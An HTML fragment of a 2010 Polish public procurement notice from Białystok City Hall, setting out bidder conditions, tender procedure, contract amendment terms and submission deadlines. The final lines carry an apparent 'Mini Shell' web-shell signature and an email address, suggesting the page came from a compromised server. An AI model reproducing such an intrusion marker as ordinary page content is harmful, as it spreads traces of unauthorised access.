b) warunki dotyczące posiadania wiedzy i doświadczenia będą badane łącznie - dokumenty określone w Rozdz. III.4.1) tiret 2  powinien złożyć co najmniej jeden z Wykonawców  wspólnie ubiegających  się o udzielenie zamówienia,
c) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w Rozdz. III.4.1) oraz oświadczenie o nie podleganiu wykluczeniu określone w Rozdz. III.4.2) tiret 1 składa pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z Wykonawców oddzielnie.

2. Zgodnie z art. 26 ust 2b) i 2c) ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany umowy wymagają dla swej ważności formy pisemnej w postaci aneksu pod rygorem nieważności i będą dopuszczane w granicach unormowania art. 144 Prawa zamówień publicznych.
2. Zamawiający  dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty  Wykonawcy w następującym zakresie i okolicznościach:
a)w przypadku zmian lokalizacyjnych jednostek organizacyjnych Zamawiającego objętych zakresem zamówienia (w obrębie tej samej strefy numeracyjnej) - wymagane jest wtedy jej bezpłatne przeniesienie w miejsce wskazane przez Zamawiającego w nieprzekraczalnym terminie 7 dni od dnia pisemnego wezwania przez Zamawiającego, lub w przypadku braku możliwości technicznych dotrzymania ww terminu, zapewnienia rozwiązania tymczasowego/zastępczego, umożliwiającego normalne funkcjonowanie Zamawiającego w ramach nowej lokalizacji.
b) w przypadku zmiany obowiązujących  przepisów prawa,
c)  w przypadku ustawowej zmiany stawki podatku VAT wynagrodzenia brutto. 

W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni  od powzięcia wiadomości o tych okolicznościach. W takim przypadku,  Wykonawca  może żądać wyłącznie wynagrodzenia należnego mu z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku, Departament Obsługi Urzędu, ul. Słonimska 1, Białystok, pokój nr 01.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2010 godzina 09:45, miejsce: Urząd Miejski w Białymstoku, Departament Obsługi Urzędu, 15-950 Białystok, ul. Słonimska 1, pokój nr 03 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com